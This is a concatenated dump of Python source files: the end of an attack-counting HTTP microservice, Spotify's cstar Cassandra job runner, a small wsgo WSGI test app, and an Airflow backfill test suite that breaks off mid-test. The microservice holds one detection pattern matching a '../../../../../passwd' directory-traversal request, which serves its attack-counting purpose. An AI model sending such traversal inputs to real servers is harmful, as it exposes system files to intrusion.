stats['Total']['Attacks'] += 1
stats['Total']['XSS'] += 1
stats['Last 30 Seconds']['Attacks'] += 1
stats['Last 30 Seconds']['XSS'] += 1
if STATSD_HOST:
server_stats.incr('attacks')
server_stats.incr('xss')
host_stats.incr('attacks')
host_stats.incr('xss')
if re.search('../../../../../passwd', urllib.parse.unquote(self.path)):
print(time.strftime("%Y-%m-%dT%H:%M:%S") + ' Directory Traversal attack detected')
with lock:
stats['Total']['Attacks'] += 1
stats['Total']['Directory Traversal'] += 1
stats['Last 30 Seconds']['Attacks'] += 1
stats['Last 30 Seconds']['Directory Traversal'] += 1
if STATSD_HOST:
server_stats.incr('attacks')
server_stats.incr('directory_traversal')
host_stats.incr('attacks')
host_stats.incr('directory_traversal')
class stats_httpd(BaseHTTPRequestHandler):
server_name = socket.gethostname()
server_ip = socket.gethostbyname(server_name)
def do_GET(self):
host_header = self.headers['Host']
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
with lock:
self.response = {
'time': time.asctime(),
'runtime': int(time.time() - START_TIME),
'hostname': self.server_name,
'ip': self.server_ip,
'stats': stats['Total'],
'config': {
'LISTEN_PORT': LISTEN_PORT,
'STATS_PORT': int(STATS_PORT),
'STATSD_HOST': STATSD_HOST,
'STATSD_PORT': STATSD_PORT,
'RESPOND_BYTES': RESPOND_BYTES,
'STOP_SECONDS': STOP_SECONDS,
'STOP_PADDING': STOP_PADDING,
'TOTAL_STOP_SECONDS': STOP_SECONDS + padding,
}
}
body = json.dumps(self.response, indent=2)
self.wfile.write(body.encode('utf-8'))
def statistics_server():
stats_server = ThreadingHTTPServer((HOST_NAME, int(STATS_PORT)), stats_httpd)
stats_server.serve_forever()
def main():
microservice = ThreadingHTTPServer((HOST_NAME, LISTEN_PORT), httpd)
while keep_running():
microservice.handle_request()
if every_30_seconds():
# Print and clear statistics
with lock:
print(json.dumps(stats))
stats['Last 30 Seconds'] = {
'Requests': 0,
'Sent Bytes': 0,
'Received Bytes': 0,
'Attacks': 0,
'SQLi': 0,
'XSS': 0,
'Directory Traversal': 0
}
if STATS_PORT:
stats_thread = threading.Thread(target=statistics_server, daemon=True)
stats_thread.start()
main()
|
job.py
|
# Copyright 2017 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import queue
import time
import socket
import os
import threading
import functools
import cstar.remote
import cstar.endpoint_mapping
import cstar.topology
import cstar.nodetoolparser
import cstar.state
import cstar.strategy
import cstar.jobrunner
import cstar.jobprinter
import cstar.jobwriter
from cstar.exceptions import BadSSHHost, NoHostsSpecified, HostIsDown, \
NoDefaultKeyspace, UnknownHost, FailedExecution
from cstar.output import msg, debug, emph, info, error
MAX_ATTEMPTS = 3
@functools.lru_cache(None)
def ip_lookup(name):
return socket.gethostbyname(name)
class Job(object):
"""The class that wires all the business logic together.
Currently polluted by some business logic of it's own. The job handling and some small snippets of code
should be moved out of this class.
"""
def __init__(self):
self._connections = {}
self.results = queue.Queue()
self.handled_finished_jobs = set()
self.state = None
self.command = None
self.job_id = None
self.timeout = None
self.env = None
self.errors = []
self.do_loop = False
self.job_runner = None
self.key_space = None
self.output_directory = None
self.is_preheated = False
self.sleep_on_new_runner = None
self.sleep_after_done = None
self.ssh_username = None
self.ssh_password = None
self.ssh_identity_file = None
self.jmx_username = None
self.jmx_password = None
self.returned_jobs = list()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
self.close()
if exc_type:
if exc_type == NoHostsSpecified:
error("No hosts specified")
elif exc_type in [BadSSHHost, NoDefaultKeyspace, HostIsDown, UnknownHost]:
error(exc_value)
def get_cluster_topology(self, seed_nodes):
count = 0
tried_hosts = []
for host in seed_nodes:
tried_hosts.append(host)
conn = self._connection(host)
describe_res = self.run_nodetool(conn, "describecluster")
topology_res = self.run_nodetool(conn, "ring")
if (describe_res.status == 0) and (topology_res.status == 0):
cluster_name = cstar.nodetoolparser.parse_describe_cluster(describe_res.out)
topology = cstar.nodetoolparser.parse_nodetool_ring(topology_res.out, cluster_name, self.reverse_dns_preheat)
return topology
count += 1
if count >= MAX_ATTEMPTS:
break
raise HostIsDown("Could not find any working host while fetching topology. Is Cassandra actually running? Tried the following hosts:",
", ".join(tried_hosts))
def reverse_dns_preheat(self, ips):
if self.is_preheated:
return
self.is_preheated = True
def get_host_by_addr(ip):
try:
socket.gethostbyaddr(ip)
except socket.herror:
pass
def create_lookup_thread(ip):
return threading.Thread(target=lambda: get_host_by_addr(ip))
print("Preheating DNS cache")
threads = [create_lookup_thread(ip) for ip in ips]
for thread in threads:
thread.start()
for thread in threads:
# Don't wait around forever for slow DNS
thread.join(1.0)
print("Preheating done")
def get_keyspaces(self, conn):
cfstats_output = self.run_nodetool(conn, *("cfstats", "|", "grep", "Keyspace"))
return cstar.nodetoolparser.extract_keyspaces_from_cfstats(cfstats_output.out)
def get_endpoint_mapping(self, topology):
clusters = []
failed_hosts = []
mappings = []
for host in topology.get_up():
if host.cluster in clusters:
# We need to fetch keyspaces on one node per cluster, no more.
continue
count = 0
clusters.append(host.cluster)
conn = self._connection(host)
if self.key_space:
keyspaces = [self.key_space]
else:
keyspaces = self.get_keyspaces(conn)
has_error = True
for keyspace in keyspaces:
if not keyspace in ['system', 'system_schema']:
debug("Fetching endpoint mapping for keyspace", keyspace)
res = self.run_nodetool(conn, *("describering", keyspace))
has_error = False
if res.status != 0 and not keyspace.startswith("system"):
has_error = True
break
describering = cstar.nodetoolparser.parse_nodetool_describering(res.out)
range_mapping = cstar.nodetoolparser.convert_describering_to_range_mapping(describering)
mappings.append(cstar.endpoint_mapping.parse(range_mapping, topology, lookup=ip_lookup))
if count >= MAX_ATTEMPTS:
failed_hosts += host
break
count += 1
if failed_hosts:
raise HostIsDown("Following hosts couldn't be reached: {}".format(', '.join(host.fqdn for host in failed_hosts)))
return cstar.endpoint_mapping.merge(mappings)
def run_nodetool(self, conn, *cmds):
if self.jmx_username and self.jmx_password:
return conn.run(("nodetool", "-u", self.jmx_username, "-pw", self.jmx_password, *cmds))
else:
return conn.run(("nodetool", *cmds))
def setup(self, hosts, seeds, command, job_id, strategy, cluster_parallel, dc_parallel, job_runner,
max_concurrency, timeout, env, stop_after, key_space, output_directory,
ignore_down_nodes, dc_filter,
sleep_on_new_runner, sleep_after_done,
ssh_username, ssh_password, ssh_identity_file, ssh_lib,
jmx_username, jmx_password):
msg("Starting setup")
msg("Strategy:", cstar.strategy.serialize(strategy))
msg("Cluster parallel:", cluster_parallel)
msg("DC parallel:", dc_parallel)
self.command = command
self.job_id = job_id
self.timeout = timeout
self.env = env
self.job_runner = job_runner
self.key_space = key_space
self.output_directory = output_directory or os.path.expanduser("~/.cstar/jobs/" + job_id)
self.sleep_on_new_runner = sleep_on_new_runner
self.sleep_after_done = sleep_after_done
self.ssh_username = ssh_username
self.ssh_password = ssh_password
self.ssh_identity_file = ssh_identity_file
self.ssh_lib = ssh_lib
self.jmx_username = jmx_username
self.jmx_password = jmx_password
if not os.path.exists(self.output_directory):
os.makedirs(self.output_directory)
msg("Loading cluster topology")
if seeds:
current_topology = cstar.topology.Topology([])
for seed in seeds:
current_topology = current_topology | self.get_cluster_topology((seed,))
original_topology = current_topology
if dc_filter:
original_topology = original_topology.with_dc_filter(dc_filter)
else:
current_topology = cstar.topology.Topology()
hosts_ip_set = set(socket.gethostbyname(host) for host in hosts)
for raw_host in hosts:
host = socket.gethostbyname(raw_host)
if host in current_topology:
continue
current_topology = current_topology | self.get_cluster_topology((host,))
original_topology = cstar.topology.Topology(host for host in current_topology if host.ip in hosts_ip_set)
msg("Done loading cluster topology")
debug("Run on hosts", original_topology)
debug("in topology", current_topology)
msg("Generating endpoint mapping")
if strategy is cstar.strategy.Strategy.TOPOLOGY:
endpoint_mapping = self.get_endpoint_mapping(current_topology)
msg("Done generating endpoint mapping")
else:
endpoint_mapping = None
msg("Skipping endpoint mapping because of selected strategy")
self.state = cstar.state.State(original_topology, strategy, endpoint_mapping,
cluster_parallel, dc_parallel, dc_filter=dc_filter,
max_concurrency=max_concurrency, current_topology=current_topology,
stop_after=stop_after, ignore_down_nodes=ignore_down_nodes)
msg("Setup done")
def update_current_topology(self, skip_nodes=()):
new_topology = cstar.topology.Topology()
for cluster in self.state.original_topology.get_clusters():
seeds = self.state.get_idle().with_cluster(cluster).without_hosts(skip_nodes).get_up()
# When using the all strategy, all nodes go to running, so we need to pick some node
seeds = seeds or self.state.current_topology.with_cluster(cluster).get_up()
new_topology = new_topology | self.get_cluster_topology(seeds)
self.state = self.state.with_topology(new_topology)
def wait_for_node_to_return(self, nodes=()):
"""Wait until node returns"""
while True:
try:
self.update_current_topology(nodes)
if self.state.is_healthy():
break
except BadSSHHost as e:
# If the instance used to poll cluster health is down it probably means that machine is rebooting
# State is then NOT healthy, so continue waiting...
debug("SSH to %s failed, instance down?" % (node, ), e)
cstar.jobprinter.print_progress(self.state.original_topology,
self.state.progress,
self.state.current_topology.get_down())
time.sleep(5)
def resume(self):
self.update_current_topology()
self.resume_on_running_hosts()
self.run()
def run(self):
self.do_loop = True
cstar.jobwriter.write(self)
if not self.state.is_healthy():
raise HostIsDown(
"Can't run job because hosts are down: " + ", ".join(
host.fqdn for host in self.state.current_topology.get_down()))
while self.do_loop:
self.schedule_all_runnable_jobs()
if self.state.is_done():
self.do_loop = False
self.wait_for_any_job()
self.wait_for_all_jobs()
cstar.jobprinter.print_progress(self.state.original_topology,
self.state.progress,
self.state.current_topology.get_down())
self.print_outcome()
def resume_on_running_hosts(self):
for host in self.state.progress.running:
debug("Resume on host", host.fqdn)
threading.Thread(target=self.job_runner(self, host, self.ssh_username, self.ssh_password, self.ssh_identity_file, self.ssh_lib),
name="cstar %s" % host.fqdn).start()
time.sleep(self.sleep_on_new_runner)
def print_outcome(self):
if self.state.is_done() and not self.errors:
if len(self.state.progress.done) == self.state.stop_after:
cstar.jobwriter.write(self)
msg("Job", self.job_id, "successfully ran on", self.state.stop_after, "hosts.\nTo finish the job, run",
emph("cstar continue %s" % (self.job_id,)))
msg("Job", self.job_id, "finished successfully")
else:
msg("Job", self.job_id, "finished with errors.\n"
"%s nodes finished successfully\n"
"%s nodes had errors\n"
"%s nodes didn't start executing"
% (len(self.state.progress.done),
len(self.state.progress.failed),
len(self.state.original_topology) - len(self.state.progress.done) - len(self.state.progress.failed)))
def wait_for_all_jobs(self):
while self.state.progress.running:
host, result = self.results.get()
self.returned_jobs.append((host, result))
if self.results.empty():
self.handle_finished_jobs(self.returned_jobs)
self.returned_jobs = list()
def wait_for_any_job(self):
if self.do_loop:
host, result = self.results.get(timeout=self.timeout)
self.returned_jobs.append((host, result))
while not self.results.empty():
host, result = self.results.get(timeout=self.timeout)
self.returned_jobs.append((host, result))
self.handle_finished_jobs(self.returned_jobs)
self.wait_for_node_to_return(returned_job[0] for returned_job in self.returned_jobs)
self.returned_jobs = list()
def handle_finished_jobs(self, finished_jobs):
debug("Processing ", len(finished_jobs), " finished jobs")
for finished_job in finished_jobs:
host = finished_job[0]
result = finished_job[1]
if result.status != 0:
self.errors.append((host, result))
self.state = self.state.with_failed(host)
msg("Failure on host", host.fqdn)
if result.out:
msg("stdout:", result.out)
if result.err:
msg("stderr:", result.err)
self.do_loop = False
else:
self.state = self.state.with_done(host)
info("Host %s finished successfully" % (host.fqdn,))
if result.out:
info("stdout:", result.out, sep="\n")
if result.err:
info("stderr:", result.err)
if self.sleep_after_done:
debug("Sleeping %d seconds..." % self.sleep_after_done)
time.sleep(self.sleep_after_done)
cstar.jobwriter.write(self)
# Signal the jobrunner that it can delete the remote job files and terminate.
for finished_job in finished_jobs:
host, result = finished_job
self.handled_finished_jobs.add(host)
def schedule_all_runnable_jobs(self):
while True:
next_host = self.state.find_next_host()
if not next_host:
if not self.state.progress.running:
self.do_loop = False
break
if (not next_host.is_up) and self.state.ignore_down_nodes:
self.state = self.state.with_done(next_host)
else:
self.state = self.state.with_running(next_host)
self.schedule_job(next_host)
cstar.jobwriter.write(self)
cstar.jobprinter.print_progress(self.state.original_topology,
self.state.progress,
self.state.current_topology.get_down())
def schedule_job(self, host):
debug("Running on host", host.fqdn)
threading.Thread(target=self.job_runner(self, host, self.ssh_username, self.ssh_password, self.ssh_identity_file, self.ssh_lib),
name="cstar %s" % host.fqdn).start()
time.sleep(self.sleep_on_new_runner)
def _connection(self, host):
if host not in self._connections:
self._connections[host] = cstar.remote.Remote(host, self.ssh_username, self.ssh_password, self.ssh_identity_file, self.ssh_lib)
return self._connections[host]
def close(self):
for name, conn in self._connections.items():
if conn:
conn.close()
self._connections = {}
|
wsgi.py
|
import datetime
import functools
import gc
import hashlib
import sys
import time
import threading
def blah(func):
@functools.wraps(func)
def inner(*args, **kwargs):
print("work it")
return func(*args, **kwargs)
return inner
import wsgo
@wsgo.cron(-2, -1, -1, -1, -1)
@blah
def every_two_minutes():
print("hey")
@wsgo.timer(4)
def yep():
print("sometimes")
def application(env, start_response):
#time.sleep(0.01)
# def func():
# print("Thread starting!")
# time.sleep(2)
# print("Thread finishing!")
# threading.Thread(target=func).start()
h = hashlib.md5()
n = 0
while True:
to_read = 100000
data = env['wsgi.input'].read(to_read)
h.update(data)
#if n==0:
# print(data[:1000])
n += len(data)
if len(data)<to_read:
break
#print(n, h.hexdigest())
#env['wsgi.errors'].write('reporting an error!\n')
#env['wsgi.errors'].flush()
#gc.collect()
#print(sys._debugmallocstats())
start_response('200 OK', [
#('Content-Type','text/html'),
('SomeHeader', 'yeah'),
('X-sendfile', 'go.mod'),
])
return [("The time is %s!"%(datetime.datetime.now())).encode('utf-8')]
data = {'hi':'there'}
|
test_jobs.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import datetime
import json
import logging
import multiprocessing
import os
import shutil
import threading
import time
import unittest
from tempfile import mkdtemp
import psutil
import six
import sqlalchemy
from parameterized import parameterized
import airflow.example_dags
from airflow import AirflowException, models, settings
from airflow import configuration
from airflow.bin import cli
from airflow.exceptions import DagConcurrencyLimitReached, NoAvailablePoolSlot
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.jobs import BackfillJob, BaseJob, LocalTaskJob, SchedulerJob
from airflow.models import DAG, DagBag, DagModel, DagRun, Pool, SlaMiss, \
TaskInstance as TI, errors
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from airflow.utils import timezone
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag, list_py_file_paths
from airflow.utils.dates import days_ago
from airflow.utils.db import create_session
from airflow.utils.db import provide_session
from airflow.utils.net import get_hostname
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from tests.compat import MagicMock, Mock, PropertyMock, patch
from tests.compat import mock
from tests.core import TEST_DAG_FOLDER
from tests.executors.test_executor import TestExecutor
from tests.test_utils.db import clear_db_dags, clear_db_errors, clear_db_pools, \
clear_db_runs, clear_db_sla_miss
from tests.test_utils.decorators import mock_conf_get
configuration.load_test_config()
logger = logging.getLogger(__name__)
DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TRY_NUMBER = 1
# Include the words "airflow" and "dag" in the file contents,
# tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
class BaseJobTest(unittest.TestCase):
class TestJob(BaseJob):
__mapper_args__ = {
'polymorphic_identity': 'TestJob'
}
def __init__(self, cb):
self.cb = cb
super().__init__()
def _execute(self):
return self.cb()
def test_state_success(self):
job = self.TestJob(lambda: True)
job.run()
self.assertEqual(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_sysexit(self):
import sys
job = self.TestJob(lambda: sys.exit(0))
job.run()
self.assertEqual(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_failed(self):
def abort():
raise RuntimeError("fail")
job = self.TestJob(abort)
with self.assertRaises(RuntimeError):
job.run()
self.assertEqual(job.state, State.FAILED)
self.assertIsNotNone(job.end_date)
class BackfillJobTest(unittest.TestCase):
def _get_dummy_dag(self, dag_id, pool=None):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='op',
pool=pool,
dag=dag)
dag.clear()
return dag
def _times_called_with(self, method, class_):
count = 0
for args in method.call_args_list:
if isinstance(args[0][0], class_):
count += 1
return count
@classmethod
def setUpClass(cls):
cls.dagbag = DagBag(include_examples=True)
def setUp(self):
clear_db_runs()
clear_db_pools()
self.parser = cli.CLIFactory.get_parser()
def test_unfinished_dag_runs_set_to_failed(self):
dag = self._get_dummy_dag('dummy_dag')
dag_run = dag.create_dagrun(
run_id='test',
state=State.RUNNING,
)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=8),
ignore_first_depends_on_past=True
)
job._set_unfinished_dag_runs_to_failed([dag_run])
dag_run.refresh_from_db()
self.assertEquals(State.FAILED, dag_run.state)
def test_dag_run_with_finished_tasks_set_to_success(self):
dag = self._get_dummy_dag('dummy_dag')
dag_run = dag.create_dagrun(
run_id='test',
state=State.RUNNING,
)
for ti in dag_run.get_task_instances():
ti.set_state(State.SUCCESS)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=8),
ignore_first_depends_on_past=True
)
job._set_unfinished_dag_runs_to_failed([dag_run])
dag_run.refresh_from_db()
self.assertEquals(State.SUCCESS, dag_run.state)
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
target_dag.sync_to_db()
scheduler = SchedulerJob()
task_instances_list = Mock()
scheduler._process_task_instances(target_dag, task_instances_list=task_instances_list)
self.assertFalse(task_instances_list.append.called)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True
)
job.run()
scheduler._process_task_instances(target_dag, task_instances_list=task_instances_list)
self.assertTrue(task_instances_list.append.called)
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('example_bash_operator')
end_date = DEFAULT_DATE + datetime.timedelta(days=1)
executor = TestExecutor()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=end_date,
executor=executor,
ignore_first_depends_on_past=True
)
job.run()
expected_execution_order = [
("runme_0", DEFAULT_DATE),
("runme_1", DEFAULT_DATE),
("runme_2", DEFAULT_DATE),
("runme_0", end_date),
("runme_1", end_date),
("runme_2", end_date),
("also_run_this", DEFAULT_DATE),
("also_run_this", end_date),
("run_after_loop", DEFAULT_DATE),
("run_after_loop", end_date),
("run_this_last", DEFAULT_DATE),
("run_this_last", end_date),
]
self.maxDiff = None
self.assertListEqual(
[((dag.dag_id, task_id, when, 1), State.SUCCESS)
for (task_id, when) in expected_execution_order],
executor.sorted_tasks
)
session = settings.Session()
drs = session.query(DagRun).filter(
DagRun.dag_id == dag.dag_id
).order_by(DagRun.execution_date).all()
self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
self.assertTrue(drs[0].state == State.SUCCESS)
self.assertTrue(drs[1].execution_date ==
DEFAULT_DATE + datetime.timedelta(days=1))
self.assertTrue(drs[1].state == State.SUCCESS)
dag.clear()
session.close()
@unittest.skipIf(
"sqlite" in configuration.conf.get("core", "sql_alchemy_conn"),
"concurrent access not supported in sqlite",
)
@parameterized.expand(
[
[
"example_branch_operator",
(
"run_this_first",
"branching",
"branch_a",
"branch_b",
"branch_c",
"branch_d",
"follow_branch_a",
"follow_branch_b",
"follow_branch_c",
"follow_branch_d",
"join",
),
],
[
"example_bash_operator",
("runme_0", "runme_1", "runme_2", "also_run_this", "run_after_loop", "run_this_last"),
],
[
"example_skip_dag",
(
"always_true_1",
"always_true_2",
"skip_operator_1",
"skip_operator_2",
"all_success",
"one_success",
"final_1",
"final_2",
),
],
["latest_only", ("latest_only", "task1")],
]
)
def test_backfill_examples(self, dag_id, expected_execution_order):
"""
Test backfilling example dags
Try to backfill some of the example dags. Be careful, not all dags are suitable
for doing this. For example, a dag that sleeps forever, or does not have a
schedule won't work here since you simply can't backfill them.
"""
self.maxDiff = None
dag = self.dagbag.get_dag(dag_id)
logger.info('*** Running example DAG: %s', dag.dag_id)
executor = TestExecutor()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
ignore_first_depends_on_past=True)
job.run()
self.assertListEqual(
[((dag_id, task_id, DEFAULT_DATE, 1), State.SUCCESS)
for task_id in expected_execution_order],
executor.sorted_tasks
)
def test_backfill_conf(self):
dag = self._get_dummy_dag('test_backfill_conf')
executor = TestExecutor()
conf = json.loads("""{"key": "value"}""")
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf=conf)
job.run()
dr = DagRun.find(dag_id='test_backfill_conf')
self.assertEqual(conf, dr[0].conf)
@patch('airflow.jobs.LoggingMixin.log')
def test_backfill_respect_concurrency_limit(self, mock_log):
dag = self._get_dummy_dag('test_backfill_respect_concurrency_limit')
dag.concurrency = 2
executor = TestExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
self.assertTrue(0 < len(executor.history))
concurrency_limit_reached_at_least_once = False
num_running_task_instances = 0
for running_task_instances in executor.history:
self.assertLessEqual(len(running_task_instances), dag.concurrency)
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == dag.concurrency:
concurrency_limit_reached_at_least_once = True
self.assertEquals(8, num_running_task_instances)
self.assertTrue(concurrency_limit_reached_at_least_once)
times_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
self.assertEquals(0, times_pool_limit_reached_in_debug)
self.assertGreater(times_concurrency_limit_reached_in_debug, 0)
@patch('airflow.jobs.LoggingMixin.log')
@patch('airflow.jobs.conf.getint')
def test_backfill_with_no_pool_limit(self, mock_getint, mock_log):
non_pooled_backfill_task_slot_count = 2
def getint(section, key):
if section.lower() == 'core' and \
'non_pooled_backfill_task_slot_count' == key.lower():
return non_pooled_backfill_task_slot_count
else:
return configuration.conf.getint(section, key)
mock_getint.side_effect = getint
dag = self._get_dummy_dag('test_backfill_with_no_pool_limit')
executor = TestExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
self.assertTrue(0 < len(executor.history))
non_pooled_task_slot_count_reached_at_least_once = False
num_running_task_instances = 0
# if no pool is specified, the number of tasks running in
# parallel per backfill should be less than
# non_pooled_backfill_task_slot_count at any point of time.
for running_task_instances in executor.history:
self.assertLessEqual(
len(running_task_instances),
non_pooled_backfill_task_slot_count,
)
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == non_pooled_backfill_task_slot_count:
non_pooled_task_slot_count_reached_at_least_once = True
self.assertEquals(8, num_running_task_instances)
self.assertTrue(non_pooled_task_slot_count_reached_at_least_once)
times_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
self.assertEquals(0, times_concurrency_limit_reached_in_debug)
self.assertGreater(times_pool_limit_reached_in_debug, 0)
def test_backfill_pool_not_found(self):
dag = self._get_dummy_dag(
dag_id='test_backfill_pool_not_found',
pool='king_pool',
)
executor = TestExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
try:
job.run()
except AirflowException:
return
self.fail()
@patch('airflow.jobs.LoggingMixin.log')
def test_backfill_respect_pool_limit(self, mock_log):
session = settings.Session()
slots = 2
pool = Pool(
pool='pool_with_two_slots',
slots=slots,
)
session.add(pool)
session.commit()
dag = self._get_dummy_dag(
dag_id='test_backfill_respect_pool_limit',
pool=pool.pool,
)
executor = TestExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
self.assertTrue(0 < len(executor.history))
pool_was_full_at_least_once = False
num_running_task_instances = 0
for running_task_instances in executor.history:
self.assertLessEqual(len(running_task_instances), slots)
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == slots:
pool_was_full_at_least_once = True
self.assertEquals(8, num_running_task_instances)
self.assertTrue(pool_was_full_at_least_once)
times_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
self.assertEquals(0, times_concurrency_limit_reached_in_debug)
self.assertGreater(times_pool_limit_reached_in_debug, 0)
def test_backfill_run_rescheduled(self):
dag = DAG(
dag_id='test_backfill_run_rescheduled',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_run_rescheduled_task-1',
dag=dag,
)
dag.clear()
executor = TestExecutor()
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UP_FOR_RESCHEDULE)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor()
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_upstream_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_upstream_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
t1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1',
dag=dag)
t2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2',
dag=dag)
t1.set_upstream(t2)
dag.clear()
executor = TestExecutor()
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks_without_flag(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor()
job = BackfillJob(dag=dag,
executor=executor,
